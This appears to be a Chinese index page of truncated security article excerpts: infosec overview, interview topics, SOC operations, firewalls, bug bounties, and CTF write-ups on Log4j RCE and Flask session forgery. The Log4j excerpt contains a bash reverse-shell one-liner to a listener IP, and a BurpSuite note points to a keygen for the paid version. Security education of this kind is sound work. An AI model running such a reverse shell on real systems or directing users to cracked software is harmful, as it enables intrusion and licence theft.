渗透测试
信息安全概述 信息安全 (infosec) 是一个广阔的领域。该领域在过去几年中取得了长足的发展和发展。它提供许多专业,包括但不限于: 网络和基础设施安全 应用程序安全性 安全测试 系统审计 业务连续性规划 数字取证 事件检测和响应 简而言之,信息安全是保护数据免受未经授权的访问、更改、非法使用、中断等...
信息安全概述 信息安全 (infosec) 是一个广阔的领域。该领域在过去几年中取得了长足的发展和发展。它提供许多专业,包括但不限于: 网络和基础设施安全 应用程序安全性 安全测试 系统审计 业务连续性规划 数字取证 事件检测和响应 简而言之,信息安全是保护数据免受未经授权的访问、更改、非法使用、中断等...
漏洞相关: 挖洞经历和CTF经历:要求介绍自认为有趣的相关经历。 常用漏洞:包括平时用得较多的漏洞及其原理、修复方案,如SQL注入、上传Webshell等。 开源组件高危漏洞:要求列举所知道的所有相关漏洞。 CVE或POC:需要描述深入研究过的CVE或POC。 反序列化漏洞:包括php/java反序列化漏洞的原理和解...
安全运营思维导图 以下是对文档《安全运营之路》的总结: 对安全运营的理解: 是什么:未明确提及。 做什么:包括满足价值需求和提升成熟度,涉及理论体系与工程框架,以及ATT&CK攻击防御框架。 怎么做:通过数据驱动,涵盖核心内容如SOC、安全威胁情报简述、安全数据分析平台等。 安全建设篇: ...
态势感知安全检测 flowchart TD A[开始] --> B[背景与目标] B --> C[态势感知部署思路与功能] C --> D[态势感知监测实施方法] D --> E[攻防实战] E --> F[修筑流量监测纵深异构防御战线] E --> G[修筑重要系统防御战线] E --> ...
防火墙是网络安全的关键部分,它充当受信任的内部网络和不受信任的外部网络(如 Internet)之间的屏障。根据预定义的安全规则监控和控制传入和传出的网络流量。 防火墙可以作为硬件设备、软件应用程序或两者的组合来实现。它们有多种用途: 存取控制: 防火墙根据配置的规则来调节允许或阻止哪些网络连接。 威胁预防: 它们可以防止各种外部威胁,例如恶意软件、病毒和潜在的黑客攻击。 ...
题解思路 成因 该漏洞的主要原因是log4j在日志输出中,未对字符合法性进行严格的限制,执行了JNDI协议加载的远程恶意脚本,从而造成RCE。这里面有一个关键点就是,什么是JNDI,为什么JNDI可以造成RCE 编写恶意代码 反弹shell bash -i >& /dev/tcp/192.168.31.241/44443 0>&1 进行base...
题解思路 伪造session,获取flag uuid.getnode()函数可以获取网卡mac地址并转换成十进制数返回 获取网卡mac地址 伪造session flask manage session 为flask的session管理器,可以伪造session
介绍 欢迎来到惊心动魄的漏洞赏金狩猎世界 - 在这里,发现软件中的故障不仅是一种爱好,而且是通往潜在财富和认可的门户!想象一下,成为一名数字侦探,解开大多数人甚至不会注意到的谜团,并因此获得奖励。在本指南中,我们将揭示漏洞赏金猎杀的基础知识,逐步演练如何挖掘常见漏洞,并分享一些不错的资源来帮助您入门。系好安全带,这将是一次虫子般的旅程! 什么是漏洞赏金狩猎? 漏洞赏金狩猎就像是网络安全...
安装 推荐下载最新版本的 BurpSuite,官方下载地址 最新的里面自己携带了JDK, 避免JDK版本不匹配的问题 注册机 ,可以去SiteByteSec获取 修改BurpSuitePro.vmoptions文件内容 注意注册机器名称一致 启动 为了可以直接使用 Burpsuite 可以修改同名文件下的的 BurpSuitePro.vmoptions...
原因 使用字符串文法来表示多种含义的方式通常暗藏一些漏洞,比如这里,进入这个if语句需要满足三个条件: r->filename的前6个字符等于proxy: r->filename的字符串中含有关键字unix: unix:关键字后的部分含有字符| 当满足这三个条件后,将unix:后面的内容进行解析,设置成uds_path的值;将字符|后面的内容,设置成rurl的值。 利用 ...